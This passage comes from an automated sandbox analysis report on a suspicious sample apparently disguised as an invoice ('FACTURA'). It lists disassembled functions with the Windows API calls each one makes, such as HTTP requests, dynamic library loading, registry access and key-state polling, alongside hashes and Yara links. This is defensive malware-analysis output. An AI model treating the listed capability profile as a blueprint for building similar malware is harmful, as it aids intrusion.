                                                                            • Opcode ID: d53ba10572a408ba2444f384b1df483e320dd967a68faab7779084093817a669
                                                                            • Instruction ID: d796243cbbc9da050805adb63be32eed4bcacce56e829982e2b07b13afe4705b
                                                                            • Opcode Fuzzy Hash: d53ba10572a408ba2444f384b1df483e320dd967a68faab7779084093817a669
                                                                            • Instruction Fuzzy Hash: 44210472A01208BBDB14ABB0DC85DFFB7A9DF453A0F14411AF821A72E1DF39480AA610
                                                                            Function 00F4182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F4184C
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F41872
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F418A2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00F418E9
                                                                              • Part of subcall function 00F42483: GetLastError.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F42498
                                                                              • Part of subcall function 00F42483: SetEvent.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F424AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: 0d0b6184f590c467a6fab970dc13959d9a11a59dc65018885cfa9e20a44fe907
                                                                            • Instruction ID: 319dba2816ca62c81204a03c4d85100d9395d78c95f7c8422b51749a0b7134b9
                                                                            • Opcode Fuzzy Hash: 0d0b6184f590c467a6fab970dc13959d9a11a59dc65018885cfa9e20a44fe907
                                                                            • Instruction Fuzzy Hash: 1421BEB150030CBFEB119B60DC85EBF7BEDFB48755F10412AF905A2240EA248D48B7A0
                                                                            Function 00F563E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ED1D73
                                                                              • Part of subcall function 00ED1D35: GetStockObject.GDI32(00000011), ref: 00ED1D87
                                                                              • Part of subcall function 00ED1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED1D91
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F56461
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00F56468
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F5647D
                                                                            • DestroyWindow.USER32(?), ref: 00F56485
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 6f3d30c29dc216e54bcb266ecaf8ae3dc65b8578b0d5ea221ded151e702247fa
                                                                            • Instruction ID: f04a738a926dcc0dbd4f2459d964ac4e1b2714c0ada79aad791e7c7f49198880
                                                                            • Opcode Fuzzy Hash: 6f3d30c29dc216e54bcb266ecaf8ae3dc65b8578b0d5ea221ded151e702247fa
                                                                            • Instruction Fuzzy Hash: 51217C71600209ABEF108F64DC80EBB77A9EB59375F904629FB20D3190D7759C45B760
                                                                            Function 00F36D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00F36DBC
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F36DEF
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00F36E01
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F36E3B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 171b51be50142e84b62fcd19e37d134f662f28b368163192d2d48631fe954553
                                                                            • Instruction ID: 6099b1c527f6188aa82d5eda8b65ae3223dd2048bc546126943c94af4bd6be6a
                                                                            • Opcode Fuzzy Hash: 171b51be50142e84b62fcd19e37d134f662f28b368163192d2d48631fe954553
                                                                            • Instruction Fuzzy Hash: 13219275A00309BBDB209F29DC04A9A77F4EF45731F208629FDA0D72D0DB709955AB54
                                                                            Function 00F36E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00F36E89
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F36EBB
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00F36ECC
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F36F06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 76a639aed1812cd86b607b2e0d67b078b09e99a6916e292d9e87fb1839929b8b
                                                                            • Instruction ID: ae743f726f30061657a76d2a1915fde461197930f87a106fedc957410c6207da
                                                                            • Opcode Fuzzy Hash: 76a639aed1812cd86b607b2e0d67b078b09e99a6916e292d9e87fb1839929b8b
                                                                            • Instruction Fuzzy Hash: 5C21B079900305EBDB209F69CC04A9A77E8AF45731F208A19F9A0D72D0DB70A898AB14
                                                                            Function 00F3AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F3AC54
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F3ACA8
                                                                            • __swprintf.LIBCMT ref: 00F3ACC1
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F5F910), ref: 00F3ACFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: adb887564353a3c90474ae5a084f2dfd3f511abdc38d81acd21c4e908c17b650
                                                                            • Instruction ID: 4622fb2dc3601fd8bdc012d27f64adbf7423b6e7495446df65f44f7897484f14
                                                                            • Opcode Fuzzy Hash: adb887564353a3c90474ae5a084f2dfd3f511abdc38d81acd21c4e908c17b650
                                                                            • Instruction Fuzzy Hash: 44217135A00209AFCB10DF65CD45DAE7BF8EF89715B0040A9F909EB352DB31EA45DB61
                                                                            Function 00F31AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F31B19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 9a56bd666d96fb416b05263f8bdd9f1a97e5688d4fd1f743e79acf111c42da2f
                                                                            • Instruction ID: e8ab55dcb50c58096b2ed3bbbb4ec8066ba4cca0e2695d7745ca6510a4995260
                                                                            • Opcode Fuzzy Hash: 9a56bd666d96fb416b05263f8bdd9f1a97e5688d4fd1f743e79acf111c42da2f
                                                                            • Instruction Fuzzy Hash: C3115B719102088FCF00EFA4D9618FEF7B4FF66324F5484A9D814AB692EB325D06EB50
                                                                            Function 00F4EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F4EC07
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F4EC37
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F4ED6A
                                                                            • CloseHandle.KERNEL32(?), ref: 00F4EDEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: 67ba89c1fa4bbce1360dfb1405204c70acb87c0a36d95ff7c88434c4d50fcc4d
                                                                            • Instruction ID: 1dfefc5fc44005a40b6c64e6571ddd7f4a4e52f16700bdd1ef5b9498e0937209
                                                                            • Opcode Fuzzy Hash: 67ba89c1fa4bbce1360dfb1405204c70acb87c0a36d95ff7c88434c4d50fcc4d
                                                                            • Instruction Fuzzy Hash: 1C814E71A003009FD764EF28CC46B6AB7E5EF44720F14881EF999EB3D2D671AC419B52
                                                                            Function 00F50037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F500FD
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5013C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F50183
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00F501AF
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F501BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            • Opcode ID: 694c3cdd1714dde037ef842581867f0455e2a5ebf33b77a23e1536bc76dd244c
                                                                            • Instruction ID: 59d9246261c28bb6458ae59bb1b37822f1c34b7796d500fcc0ebd6d9575e4c53
                                                                            • Opcode Fuzzy Hash: 694c3cdd1714dde037ef842581867f0455e2a5ebf33b77a23e1536bc76dd244c
                                                                            • Instruction Fuzzy Hash: 96516971608304AFC704EF58CC81E6AB7E9FF84314F44492EFA95972A2DB31E909DB52
                                                                            Function 00F4D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F4D927
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F4D9AA
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F4D9C6
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F4DA07
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F4DA21
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37896,?,?,00000000), ref: 00ED5A2C
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37896,?,?,00000000,?,?), ref: 00ED5A50
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 327935632-0
                                                                            • Opcode ID: 1807fbf647e3062a45f8f122ccad02b88eae7b87ddb9f65a7fc5b40691cf6e54
                                                                            • Instruction ID: a71999c8e22c174f5aaeda412b058a62fbfca48676eddfc4f1253bcb1b4e2208
                                                                            • Opcode Fuzzy Hash: 1807fbf647e3062a45f8f122ccad02b88eae7b87ddb9f65a7fc5b40691cf6e54
                                                                            • Instruction Fuzzy Hash: 0D512A35A00609DFCB00EFA8C8849ADBBF5FF09324B1580A6E955AB312D735ED46DF91
                                                                            Function 00F3E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F3E61F
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F3E648
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F3E687
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F3E6AC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F3E6B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: b0941a72f4662aac191e2aeb319d29042241f0ba6cf40b4ff4684dc9ae635011
                                                                            • Instruction ID: a9bdb0fc4bf66998b8ec9853154b1e7fec8b68d2db019bdf5d1000c0b0bc27fc
                                                                            • Opcode Fuzzy Hash: b0941a72f4662aac191e2aeb319d29042241f0ba6cf40b4ff4684dc9ae635011
                                                                            • Instruction Fuzzy Hash: 8D510C79A00209DFCB05EF64C9819AEBBF5EF09314F1480A5E909AB362CB31ED55DF50
                                                                            Function 00F5A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f55db90634ecc4d9292b932cc2187916b799e630b371e5cc3ccd483869b35e43
                                                                            • Instruction ID: e165217159b34888aa19289bf05706b7a76da23c3a4e64a6b7914efaddbd71de
                                                                            • Opcode Fuzzy Hash: f55db90634ecc4d9292b932cc2187916b799e630b371e5cc3ccd483869b35e43
                                                                            • Instruction Fuzzy Hash: A141A335D04608AFD721DF28CC48FA9BBA4EB09322F150365FE15A72E1DB309D69FA51
                                                                            Function 00ED2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00ED2357
                                                                            • ScreenToClient.USER32(00F957B0,?), ref: 00ED2374
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00ED2399
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00ED23A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: d87cf6012b386e00e1d905886fd00be46cb19ef2b289d46f423e03b1005b97ff
                                                                            • Instruction ID: f616b67dee696c5a330b16203c25d9c37e946f504cba9a261dbaaeb637f969e7
                                                                            • Opcode Fuzzy Hash: d87cf6012b386e00e1d905886fd00be46cb19ef2b289d46f423e03b1005b97ff
                                                                            • Instruction Fuzzy Hash: AE419D35A0420AFBCF159F68CC44AE9BB74FB15324F20435AF928A22A0C7359954EB91
                                                                            Function 00F263AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F263E7
                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00F26433
                                                                            • TranslateMessage.USER32(?), ref: 00F2645C
                                                                            • DispatchMessageW.USER32(?), ref: 00F26466
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F26475
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
